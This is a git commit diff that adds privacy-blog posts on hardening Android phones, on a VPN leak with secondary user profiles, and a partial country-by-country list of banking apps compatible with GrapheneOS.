Reorganize (#72)

* Reorganize

Signed-off-by: Tommy <contact@tommytran.io>

This commit is contained in: parent 46501875be, commit bf55611133
37 changed files with 127 additions and 78 deletions
content/posts/_index.md (new file)

@ -0,0 +1,7 @@
---
title: Categories
ShowReadingTime: false
ShowWordCount: false
---

Find the content you are looking for!

content/posts/android/Android Tips.md (new file)

@ -0,0 +1,221 @@
---
title: "Android Tips"
date: 2022-07-22
tags: ['Operating Systems', 'Android', 'Privacy', 'Security']
author: Tommy
---
Android is a very secure and robust operating system out of the box. This post is less of a "hardening guide" and more of a non-exhaustive list of tips for buying and using Android phones.
## Android Devices

### Recommended Phones



Google Pixel phones are the **only** devices I would recommend for purchase. Pixel phones have stronger hardware security than any other Android devices currently on the market, due to proper AVB support for third-party operating systems and Google's custom [Titan](https://security.googleblog.com/2021/10/pixel-6-setting-new-standard-for-mobile.html) security chips acting as the Secure Element.
When purchasing a device, you should buy one as new as possible. The software and firmware of mobile devices are only supported for a limited time, so buying new extends that lifespan as much as possible. Also, beginning with the **Pixel 6** and **6 Pro**, Pixel devices receive a minimum of 5 years of guaranteed security updates, ensuring a much longer lifespan compared to the 2-4 years competing OEMs typically offer.
### Phones to Avoid

Avoid buying the Fairphone 4, which will only receive just over 2 years of full security updates from its release date despite Fairphone advertising 6 years of support. This is because the System on a Chip it uses (the Snapdragon 750G) only has 3 years of support from Qualcomm, and the SoC was already old when the phone came out. Moreover, the Fairphone 4 [uses the Android Verified Boot Test Key as their OEM keys](https://forum.fairphone.com/t/bootloader-avb-keys-used-in-roms-for-fairphone-3-4/83448/11), effectively making Verified Boot useless. In general, you should check how long the SoC in a phone is supported for and not blindly trust the manufacturer's claims.
You should also avoid buying /e/ OS phones (sometimes branded as Murena phones). /e/ OS is in itself extremely insecure: it does not support verified boot, ships `userdebug` builds, [ships months-old versions of Chromium, and bundles a years-old version of Orbot into the operating system while marketing it as "Advanced Privacy"](https://divestos.org/misc/e.txt), among other issues. They also recently had an incident where their cloud service mishandled session keys and gave users access to each other's files, then proceeded to [mislead users into believing that the server could not see their files](https://community.e.foundation/t/service-announcement-26-may/41252/30) despite there being no end-to-end encryption.
You should also be very wary of low-quality privacy-branded phones like the Freedom Phone, BraX2 Phone, Volta Phone, and the like. These are cheap Chinese phones with the [MediaTek Helio P60](https://i.mediatek.com/p60) from 2018, which has already reached or is near end-of-life. Needless to say, you should also avoid any vendor who claims their phones are zero-day proof, like this:

|
||||
|
||||
## Android-based Operating Systems
|
||||
|
||||

|
||||
|
||||
In certain cases, installing a custom Android-based operating system can help increase your privacy and security. This is rather tricky, however, as the vast majority of these operating systems (a.k.a. "custom ROMs") do exactly the opposite: they break the Android security model, ruining your security while providing no or dubious privacy benefits.
I have written a detailed post on selecting your Android-based operating system, which you can find [here](/posts/os/choosing-your-android-based-operating-system).
**TLDR**: If you are using a modern Pixel, use [GrapheneOS](https://grapheneos.org). If you are on a device supported by [DivestOS](https://divestos.org), use DivestOS. Otherwise, stick to your stock operating system. Do not blindly use an OS just because it is advertised as "degoogled".
## Use New Android Versions
It's important to not use an [end-of-life](https://endoflife.date/android) version of Android. Newer versions of Android receive not only security updates for the operating system but also important privacy-enhancing updates. For example, [prior to Android 10](https://developer.android.com/about/versions/10/privacy/changes), any app with the [`READ_PHONE_STATE`](https://developer.android.com/reference/android/Manifest.permission#READ_PHONE_STATE) permission could access sensitive and unique serial numbers of your phone such as the [IMEI](https://en.wikipedia.org/wiki/International_Mobile_Equipment_Identity), [MEID](https://en.wikipedia.org/wiki/Mobile_equipment_identifier), and your SIM card's [IMSI](https://en.wikipedia.org/wiki/International_mobile_subscriber_identity), whereas now apps must be system apps to do so. System apps are only provided by the OEM or Android distribution.
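If you are not sure what a device is currently running, a quick way to check (a sketch assuming `adb` and USB debugging are set up) is to query the standard build properties:

```bash
# Android version, e.g. "13"
adb shell getprop ro.build.version.release

# Date of the last security patch the OS shipped, e.g. "2022-11-05"
adb shell getprop ro.build.version.security_patch
```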
## Do Not Root Your Phone
[Rooting](https://en.wikipedia.org/wiki/Rooting_(Android)) Android phones can decrease security significantly as it weakens the complete [Android security model](https://en.wikipedia.org/wiki/Android_(operating_system)#Security_and_privacy). This can decrease privacy should there be an exploit that is assisted by the decreased security. Common rooting methods involve directly tampering with the boot partition, making it impossible to perform successful Verified Boot. Apps that require root will also modify the system partition meaning that Verified Boot would have to remain disabled. Having root exposed directly in the user interface also increases the [attack surface](https://en.wikipedia.org/wiki/Attack_surface) of your device and may assist in [privilege escalation](https://en.wikipedia.org/wiki/Privilege_escalation) vulnerabilities and SELinux policy bypasses.
## Use a Diceware Passphrase, Avoid Pattern Unlock
On Android, the phone unlock secret (password, PIN, or pattern) is used to protect the encryption key for your device. Thus, it is vital that your unlock secret is secure and can withstand brute-force attacks.
Pattern unlock is extremely insecure and should be avoided at all costs. This is discussed in detail in the [Cracking Android Pattern Lock in Five Attempts](/researches/Cracking-Android-Pattern-Lock-in-Five-Attempts.pdf) research paper.
If you trust the hardware-enforced rate limiting features (typically done by the [Secure Element](https://en.wikipedia.org/wiki/Secure_cryptoprocessor) or [Trusted Execution Environment](https://en.wikipedia.org/wiki/Trusted_execution_environment)) of your device, an 8+ digit PIN may be sufficient.
Ideally, you should be using an 8-10 word [diceware passphrase](https://en.wikipedia.org/wiki/Diceware) to secure your phone. This would make your phone unlock practically impossible to brute force, regardless of whether there is proper rate limiting or not.
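As an illustration, here is one way to generate such a passphrase on a Linux machine from the EFF large wordlist. This is a sketch for demonstration only; `shuf` is not a substitute for real dice or a vetted generator when the stakes are high:

```bash
# Fetch the EFF large wordlist (7776 words, one per line, prefixed by dice rolls).
curl -sO https://www.eff.org/files/2016/07/18/eff_large_wordlist.txt

# Pick 8 random words and join them into a passphrase.
awk '{print $2}' eff_large_wordlist.txt | shuf -n 8 | paste -sd ' '
```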
## Use Global Toggles
Modern Android devices have global toggles for disabling Bluetooth and location services. Android 12 introduced toggles for the camera and microphone. When not in use, you should disable these features. Apps cannot use disabled features (even if granted individual permission) until re-enabled.
## Manage Android Permissions
[Permissions on Android](https://developer.android.com/guide/topics/permissions/overview) grant you control over what apps are allowed to access. Google regularly makes [improvements](https://developer.android.com/about/versions/11/privacy/permissions) to the permission system in each successive version. All apps you install are strictly [sandboxed](https://source.android.com/security/app-sandbox); therefore, there is no need to install any antivirus apps.
You can manage Android permissions by going to **Settings** → **Privacy** → **Permission Manager**. Be sure to remove any permissions from apps that they do not need.
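Runtime permissions can also be audited and revoked over `adb`; a minimal sketch, with `com.example.app` standing in for a real package name:

```bash
# Inspect which permissions an app has requested and been granted.
adb shell dumpsys package com.example.app | grep permission

# Revoke a runtime ("dangerous") permission without uninstalling the app.
adb shell pm revoke com.example.app android.permission.CAMERA
```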
## Enable VPN Killswitch
Android 7 and above supports a VPN killswitch, and it is available without the need to install third-party apps. This feature can prevent leaks if the VPN is disconnected. It can be found in **Settings** → **Network & internet** → **VPN** → **Block connections without VPN**.
## Connectivity Check
Connectivity checks on Android [do not go through the VPN tunnel](https://mullvad.net/en/blog/2022/10/10/android-leaks-connectivity-check-traffic/) (they are not supposed to anyway). This is generally not a cause for concern; however, you should be aware that Google and a network observer on your internet service provider (ISP)'s network can see that there is an Android device with your actual IP address.
On GrapheneOS, connectivity checks are done with GrapheneOS's own servers by default, instead of Google's. A network observer on your ISP's network can see that you are using a GrapheneOS device. If you are using a VPN and want to appear like a regular Android device to your ISP, go to **Settings** → **Network & internet** → **Internet connectivity check** and select **Standard (Google)** instead. Note that this will not stop a determined adversarial ISP from finding out you are not using the stock OS [through your DNS fallback](https://grapheneos.org/faq#default-dns).
If you want to, you can disable connectivity checks altogether. Note that this will stop the captive portal check from working.
- On GrapheneOS, go to **Settings** → **Network & internet** → **Internet connectivity check** and select **Disabled**
- On other Android-based operating systems, you can [disable captive portal via ADB](https://gitlab.com/CalyxOS/calyxos/-/issues/1226#note_1130393164).

To disable:
```bash
adb shell settings put global captive_portal_mode 0
```

To re-enable:

```bash
adb shell settings delete global captive_portal_mode
```
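Alternatively, on many Android builds you can point connectivity checks at a server you control rather than disabling them; a sketch, assuming `example.com` is your server and it answers the path below with an empty HTTP 204 response:

```bash
# Redirect captive portal checks to your own server (must return HTTP 204).
adb shell settings put global captive_portal_http_url "http://example.com/generate_204"
adb shell settings put global captive_portal_https_url "https://example.com/generate_204"
```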
## Media Access

Quite a few applications allow you to "share" a file with them for media upload. If you want to, for example, tweet a picture, do not grant Twitter access to your "media and photos", because it will then have access to all of your pictures. Instead, go to your file manager (documentsUI), long-press the picture, then share it with Twitter.
If you are using GrapheneOS, you should utilize the Storage Scopes feature to force apps that request broad storage access permission to function with scoped storage.


## User Profiles
Multiple user profiles can be found in **Settings** → **System** → **Multiple users** and are the simplest way to isolate apps and data in Android.
With user profiles, you can impose restrictions on a specific profile, such as: making calls, using SMS, or installing apps on the device. Each profile is encrypted using its own encryption key and cannot access the data of any other profile. Even the device owner cannot view the data of other profiles without knowing their password. Multiple user profiles are a more secure method of isolation.
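If you prefer the command line, user profiles can also be managed over `adb`; a short sketch (the profile name is arbitrary):

```bash
# Create a new secondary user profile and list all existing profiles.
adb shell pm create-user "Apps"
adb shell pm list users
```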
Note that there is currently a [VPN leakage with secondary user profiles](/posts/os/android-vpn-leakage-with-secondary-user-profiles).
## Work Profile

[Work Profiles](https://support.google.com/work/android/answer/6191949) are another way to isolate individual apps and may be more convenient than separate user profiles.

A **device controller** such as [Shelter](https://gitea.angry.im/PeterCxy/Shelter#shelter) is required, unless you're using CalyxOS which includes one.
The work profile is dependent on a device controller to function. Features such as *File Shuttle* and *contact search blocking*, or any other kind of isolation feature, must be implemented by the controller. You must also fully trust the device controller app, as it has full access to your data inside of the work profile.
This method is generally less secure than a secondary user profile; however, it does allow you the convenience of running apps in both the work and personal profiles simultaneously.
## Baseband Modem Attack Surface Reduction
By default, your baseband modem will typically be set to support just about every generation of mobile cellular technology, from 2G to 5G. This presents a large attack surface.
You can reduce this attack surface by limiting the baseband modem to just the generations it needs. In most cases, this would be 4G/LTE.
GrapheneOS has the LTE only mode exposed in settings. You can set this by going to **Settings** → **Internet** → **Your carrier name** → **Preferred network type** → **LTE Only**.
If your Android-based operating system does not expose this setting in the Settings app, or if you want to set your baseband modem to a less restrictive mode, dial `*#*#4636#*#*` then hit **Phone information**. There, you can set the preferred network type to just the generations that you intend to use. For example, if you only want to use 5G and 4G, you can set it to `NR/LTE`.
## Carrier Tracking
Carriers can track your coarse location via cell towers using the IMSI and IMEI broadcast by your baseband modem. To avoid this type of tracking, you have to enable airplane mode, which disables the baseband modem.
I have seen several common suggestions in the privacy community to mitigate this problem which do not actually work:
- **Removing the SIM card**: The baseband modem will continue to contact the cell towers with its IMEI to prepare for emergency calls. In fact, this is how you are able to call `911` even when you do not have a SIM card inserted.

- **Using PGPP as a carrier**: The service randomizes your IMSI by regularly reprovisioning your eSIM. However, the IMEI broadcast by the baseband modem would remain unchanged, allowing carriers to track you anyway.
## SMS App
## Where to Get Your Applications

### GrapheneOS App Store
GrapheneOS's app store is available on [GitHub](https://github.com/GrapheneOS/Apps/releases). It supports Android 12 and above and is capable of updating itself. The app store has standalone applications built by the GrapheneOS project such as the [Auditor](https://attestation.app/), [Camera](https://github.com/GrapheneOS/Camera), and [PDF Viewer](https://github.com/GrapheneOS/PdfViewer). If you are looking for these applications, I highly recommend that you get them from GrapheneOS's app store instead of the Play Store, as the apps on their store are signed with the GrapheneOS project's own key that Google does not have access to.
### Aurora Store
The [Aurora Store](https://auroraoss.com/download/AuroraStore/) is a proxy for the Google Play Store. It is great for privacy in the sense that it automatically gives you a disposable account to download apps, and it works on Android-based distributions that do not support Google Play Services. That being said, it lacks security features like certificate pinning and does not support Play Asset Delivery.

My recommendation is to stick with the Google Play Store unless your threat model calls for not logging into Google Services at all.
### F-Droid
F-Droid, despite being often recommended in the privacy community, has various security deficiencies. You can read more about them [here](/posts/android/f-droid-security-issues/).
I do not recommend that you use F-Droid at all unless it is your only way to obtain certain apps. In some rare cases, there may be some apps which require the F-Droid version to work properly without Google Play Services. If you do end up using F-Droid, I highly recommend that you avoid the official F-Droid client (which is extremely outdated and targets API level 25) and use a more modern client with seamless updates such as [NeoStore](https://github.com/NeoApplications/Neo-Store). You should also avoid using the official F-Droid repository as much as possible and stick to the F-Droid repositories hosted by the app developers instead.
### GitHub
You can also obtain your apps directly from their GitHub repositories. In most cases, there will be a pre-built APK for you to download. You can verify the signature of the downloaded APK using `apksigner`:

- Install [Android Studio](https://developer.android.com/studio), which includes `apksigner`. On macOS, `apksigner` can be found at `~/Library/Android/sdk/build-tools/<version>/apksigner`.
- Run `apksigner verify --print-certs --verbose myCoolApp.apk` to verify the certificate of the APK.
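Putting it together, a sketch of a first-install check; `myCoolApp.apk` is a placeholder, and the digest you compare against should come from the signing certificate fingerprint the developer publishes:

```bash
# Print the signing certificate digests of the downloaded APK.
apksigner verify --print-certs myCoolApp.apk | grep 'SHA-256 digest'

# Install only if the digest matches the developer's published fingerprint.
adb install myCoolApp.apk
```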
After you have verified the signature of the APK and installed it on your phone, there are several strategies you can use to keep the application up to date.
The first strategy is to add the Atom feed of the application's release page to an RSS reader like [ReadYou](https://github.com/Ashinch/ReadYou) to get notified of new releases. You will still need to download and install the new releases manually. If you are confused, here is a video that could help with this process:
{{< youtube id="FFz57zNR_M0">}}
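For reference, every GitHub repository exposes such an Atom feed at `https://github.com/<owner>/<repo>/releases.atom`; for example, to peek at the latest ReadYou releases from a terminal:

```bash
# List release titles from the repository's Atom feed.
curl -s https://github.com/Ashinch/ReadYou/releases.atom | grep '<title>'
```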
The second strategy is to use the [IzzyOnDroid](https://apt.izzysoft.de/fdroid/) F-Droid repository with a modern F-Droid client like [NeoStore](https://github.com/NeoApplications/Neo-Store), as mentioned [above](#f-droid). The IzzyOnDroid repository pulls new releases from various GitHub repositories to their server, which can then be automatically downloaded and installed by NeoStore. The downside of this strategy is that not every application on GitHub is on IzzyOnDroid, and sometimes IzzyOnDroid fails to pull a new release, resulting in you not getting any updates at all.
It should be noted that since Android automatically checks the signatures of updates to existing applications, you only need to manually check the signature of the APK the first time you install an application. If you do use IzzyOnDroid to update applications, you will need to manually confirm the first update of an application to authorize NeoStore as the installation source. After that, future updates will be seamless.
## Google
If you are using a device with Google services, either your stock operating system or an operating system that safely sandboxes Google Play Services like GrapheneOS, there are a number of additional changes you can make to improve your privacy.
### Enroll in the Advanced Protection Program


If you have a Google account, I suggest enrolling in the [Advanced Protection Program](https://landing.google.com/advancedprotection/). It is available at no cost to anyone with two or more hardware security keys with [FIDO2](/knowledge/multi-factor-authentication/#fido2-fast-identity-online) support.
The Advanced Protection Program provides enhanced threat monitoring and enables:
- Stricter two-factor authentication; e.g. [FIDO2](/posts/knowledge/multi-factor-authentication/#fido2-fast-identity-online) **must** be used, and the use of [SMS OTP](/posts/knowledge/multi-factor-authentication/#fido2-fast-identity-online), [TOTP](/posts/knowledge/multi-factor-authentication/#time-based-one-time-password-totp), and [OAuth](https://en.wikipedia.org/wiki/OAuth) is disallowed
- Only Google and verified third-party apps can access account data
- Scanning of incoming emails on Gmail accounts for [phishing](https://en.wikipedia.org/wiki/Phishing#Email_phishing) attempts
- Stricter [safe browser scanning](https://www.google.com/chrome/privacy/whitepaper.html#malware) with Google Chrome
- Stricter recovery process for accounts with lost credentials
If you use non-sandboxed Google Play Services (common on stock operating systems), the Advanced Protection Program also comes with [additional benefits](https://support.google.com/accounts/answer/9764949?hl=en) such as:
- Not allowing app installation outside of the Google Play Store, the OS vendor's app store, or via [`adb`](https://en.wikipedia.org/wiki/Android_Debug_Bridge)
- Mandatory automatic device scanning with [Play Protect](https://support.google.com/googleplay/answer/2812853?hl=en#zippy=%2Chow-malware-protection-works%2Chow-privacy-alerts-work)
- Warning you about unverified applications
### Google Play System Updates
In the past, Android security updates had to be shipped by the operating system vendor. Android has become more modular beginning with [Android 10](https://www.android.com/android-10/), and Google [can push security updates](https://blog.google/products/android-enterprise/android-10-security/) for **some** system components via the privileged Play Services.
If you have an EOL device that shipped with Android 10 or above (i.e. shipped beginning in 2020) and are unable to run any of the operating systems recommended above, you are likely going to be better off sticking with your OEM Android installation (as opposed to an insecure operating system such as LineageOS or /e/ OS). This will allow you to receive **some** security fixes from Google while not violating the Android security model by using an insecure Android derivative and increasing your attack surface. You should still upgrade to a supported device as soon as possible.
### Disable Advertising ID
All devices with Google Play Services installed automatically generate an [advertising ID](https://support.google.com/googleplay/android-developer/answer/6048248?hl=en) used for targeted advertising. Disable this feature to limit the data collected about you.
On Android distributions with [Sandboxed Google Play](https://grapheneos.org/usage#sandboxed-google-play), go to **Settings** → **Apps** → **Sandboxed Google Play** → **Google Settings** → **Ads**, and select *Delete advertising ID*.
On Android distributions with privileged Google Play Services (such as stock OSes), the setting may be in one of several locations. Check:

- **Settings** → **Google** → **Ads**
- **Settings** → **Privacy** → **Ads**

|
||||
|
||||
You will either be given the option to delete your advertising ID or to *Opt out of interest-based ads*; this varies between OEM distributions of Android. If presented with the option to delete the advertising ID, that is preferred. If not, make sure to opt out and reset your advertising ID.

@ -0,0 +1,29 @@
---
title: "Android VPN Leakage with Secondary User Profiles"
date: 2022-10-10
tags: ['Operating Systems', 'Android', 'Privacy']
author: Tommy
---
**Before We Start**...
I have been aware of this issue for a while now (since at least Android 11), though I have not done enough testing to see what actually causes the leak, nor do I have any workaround at the moment. My guess is that applications which launch early when you log into a secondary profile can bypass the VPN killswitch.
I have reported it on [Google's issue tracker](https://issuetracker.google.com/issues/252851265).
## The Leak
You can reproduce the leak by doing the following:
1. Create a new user profile (you need to create a secondary user profile for this, as it is not reproducible on your owner profile or a work profile). Do not log into your Google account at this stage.
2. Sideload a VPN app. The leak happens with every VPN provider I have tried (since it is likely a platform issue), though if you do not have a VPN subscription I would recommend getting a free one with [ProtonVPN](https://protonvpn.com).
3. Set up the VPN and the [Android VPN killswitch](/posts/os/android-tips/#enable-vpn-killswitch).
4. Log into your Google account through Play Services.
5. Restart the phone. Open the secondary user profile again.
6. Go to Google's [My Devices](https://myaccount.google.com/device-activity) page. Observe that one of the sessions for your phone has your actual location obtained via GeoIP. In some cases, your actual IP address will be shown there as well.
## Notes

1. It is unlikely that this is caused by Play Services being a privileged application. This issue is reproducible on GrapheneOS with the Sandboxed Play Services (which runs as a normal, unprivileged application) as well.
2. More testing is needed to find the root cause of the problem. I do not think that this is Play Services specific. Unfortunately, I do not have access to a router to do a packet capture right now. I would appreciate it if someone could help me get to the bottom of this. You can find my contact information [here](https://tommytran.io/contact/).
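If you would like to help investigate, here is a minimal capture sketch, assuming you can route the phone through a Linux machine acting as a Wi-Fi hotspot; the interface name, phone IP, and WireGuard port are placeholders for your own values:

```bash
# Show traffic from the phone that does NOT go to the VPN endpoint.
# With the killswitch enabled, anything printed here is a leak.
sudo tcpdump -i wlan0 -n 'host 192.168.12.34 and not udp port 51820'
```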

@ -0,0 +1,282 @@
---
title: "Banking Applications Compatibility with GrapheneOS"
date: "2022-01-26"
tags: ['Applications', 'Android']
author: akc3n, Tommy
---
This is a list of banking applications known to work with [GrapheneOS](https://grapheneos.org).
Banking apps are very problematic for security and privacy focused operating systems, or even alternative OSes in general, as they are often incompatible with the majority of hardening, have a hard dependency on Google Play Services, or require passing SafetyNet `ctsProfileMatch` and `basicIntegrity`.
GrapheneOS passes SafetyNet `basicIntegrity`, but it is not certified by Google so it does not pass `ctsProfileMatch`.[^1]
See [GrapheneOS's usage guide](https://grapheneos.org/usage) section on [banking apps](https://grapheneos.org/usage#banking-apps).
---

## List of Banking Apps
### Australia

- [ANZ Australia](https://play.google.com/store/apps/details?id=com.anz.android.gomoney) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/157)
- [Bank Australia App](https://play.google.com/store/apps/details?id=com.fusion.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/55)
- [Bendigo Bank](https://play.google.com/store/apps/details?id=com.bendigobank.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/88)
- [CommBank](https://play.google.com/store/apps/details?id=com.commbank.netbank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/75)
- [NAB Mobile Banking](https://play.google.com/store/apps/details?id=au.com.nab.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/76)
- [ubank – Daily Money App](https://play.google.com/store/apps/details?id=au.com.bank86400) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/156)
- [Up Money](https://play.google.com/store/apps/details?id=au.com.up.money&hl=en) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/102)
- [Westpac](https://play.google.com/store/apps/details?id=org.westpac.bank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/77)
### Austria

- [Bank Austria Mobile Banking](https://play.google.com/store/apps/details?id=com.bankaustria.android.olb) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/15)
- [Mein ELBA-App](https://play.google.com/store/apps/details?id=at.rsg.pfp) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/62)

### Belgium

- [Belfius Mobile](https://play.google.com/store/apps/details?id=be.belfius.directmobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/110)
- [ING Belgium](https://play.google.com/store/apps/details?id=com.ing.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/45)
### Brazil

- [Caixa](https://play.google.com/store/apps/details?id=br.com.gabba.Caixa) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/89)
- [Nubank](https://play.google.com/store/apps/details?id=com.nu.production) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/92)
- [Santander Brasil](https://play.google.com/store/apps/details?id=com.santander.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/151)
- [Santander Empresas](https://play.google.com/store/apps/details?id=com.santandermovelempresarial.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/153)
- [Santander Way: App de cartões](https://play.google.com/store/apps/details?id=br.com.santander.way) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/152)
### Canada

- [Affinity Credit Union](https://play.google.com/store/apps/details?id=ca.affinitycu.mobile&hl=en) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/71)
- [BMO Mobile Banking](https://play.google.com/store/apps/details?id=com.bmo.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/19)
- [EQ Bank Mobile Banking](https://play.google.com/store/apps/details?id=com.eqbank.eqbank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/103)
- [KOHO Financial](https://play.google.com/store/apps/details?id=ca.koho) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/104)
- [RBC Mobile](https://play.google.com/store/apps/details?hl=en&id=com.rbc.mobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/32)
- [QuestMobile: Invest & Trade](https://play.google.com/store/apps/details?id=com.questrade.questmobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/115)
- [Questrade](https://play.google.com/store/apps/details?id=com.questrade.my) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/114)
- [Simplii Financial](https://play.google.com/store/apps/details?id=com.pcfinancial.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/17)
- [Tangerine Mobile App](https://play.google.com/store/apps/details?id=ca.tangerine.clients.banking.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/16)
- [Wealthsimple](https://play.google.com/store/apps/details?id=com.wealthsimple) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/116)
- [Wealthsimple Invest](https://play.google.com/store/apps/details?id=com.wealthsimple.trade) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/117)
### Czech Republic

- [AirBank](https://play.google.com/store/apps/details?id=cz.airbank.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/31)
- [CREDITAS Banking](https://play.google.com/store/apps/details?id=cz.creditas.richee) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/78)
### Denmark

- [Mobilbank DK – Danske Bank](https://play.google.com/store/apps/details?id=com.danskebank.mobilebank3.dk) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/5)
- [MobilePay](https://play.google.com/store/apps/details?id=dk.danskebank.mobilepay) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/7)
- [MitID](https://play.google.com/store/apps/details?id=dk.mitid.app.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/121)
- [NemID nøgleapp](https://play.google.com/store/apps/details?id=dk.e_nettet.mobilekey.everyone) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/10)
- [Nordea Mobile](https://play.google.com/store/apps/details?id=dk.nordea.mobilebank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/118)

### Finland

- [S-mobiili](https://play.google.com/store/apps/details?id=fi.spankki) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/43)
### France

- [Boursorama Banque](https://play.google.com/store/apps/details?id=com.boursorama.android.clients) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/147)
- [Crédit Mutuel de Bretagne](https://play.google.com/store/apps/details?id=com.arkea.android.application.cmb&gl=FR) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/150)
- [La Banque Postale](https://play.google.com/store/apps/details?id=com.fullsix.android.labanquepostale.accountaccess) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/14)
- [Ma Banque](https://play.google.com/store/apps/details?id=fr.creditagricole.androidapp&gl=FR) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/73)
### Germany

- [Commerzbank Banking](https://play.google.com/store/apps/details?id=de.commerzbanking.mobil&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/22)
- [Deutsche Bank Mobile](https://play.google.com/store/apps/details?id=com.db.pwcc.dbmobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/38)
- [Digitales Bezahlen](https://play.google.com/store/apps/details?id=de.fiduciagad.android.wlwallet) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/160)
- [DKB](https://play.google.com/store/apps/details?id=com.dkbcodefactory.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/106)
- [flatex next](https://play.google.com/store/apps/details?id=de.xcom.flatexde) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/59)
- [ING Banking to go](https://play.google.com/store/apps/details?id=de.ingdiba.bankingapp&hl=de&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/48)
- [Kontist](https://play.google.com/store/apps/details?id=com.kontist&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/23)
- [N26 — The Mobile Bank](https://play.google.com/store/apps/details?id=de.number26.android&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/21)
- [Penta — Business Banking App](https://play.google.com/store/apps/details?id=com.getpenta.app&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/24)
- [PSD Banking](https://play.google.com/store/apps/details?id=de.psd.banking.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/159)
- [Santander Banking](https://play.google.com/store/apps/details?id=de.santander.presentation) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/119)
- [SecureGo plus](https://play.google.com/store/apps/details?id=de.fiduciagad.securego.wl) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/161)
- [Sparkasse](https://play.google.com/store/apps/details?id=com.starfinanz.smob.android.sfinanzstatus) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/44)
- [Tomorrow Mobile Banking](https://play.google.com/store/apps/details?id=one.tomorrow.app&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/20)
- [Volksbanken Raiffeisenbanken](https://play.google.com/store/apps/details?id=de.fiduciagad.banking.vr) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/36)
- [Volksbanken Raiffeisenbanken — Companion App](https://play.google.com/store/apps/details?id=de.fiduciagad.android.vrwallet) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/35)
### Hungary

- [UniCredit mBanking](https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.mUCI.hu&hl=en&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/87)

### India

- [Axis Mobile](https://play.google.com/store/apps/details?id=com.axis.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/139)
- [BHIM](https://play.google.com/store/apps/details?id=in.org.npci.upiapp) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/135)
- [Cent Mobile](https://play.google.com/store/apps/details?id=com.infrasofttech.CentralBank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/142)
- [HDFC Bank](https://play.google.com/store/apps/details?id=com.snapwork.hdfc) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/138)
- [Kotak - 811 & Mobile Banking](https://play.google.com/store/apps/details?id=com.msf.kbank.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/137)
- [PhonePe](https://play.google.com/store/apps/details?id=com.phonepe.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/134)
- [Paytm](https://play.google.com/store/apps/details?id=net.one97.paytm) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/140)
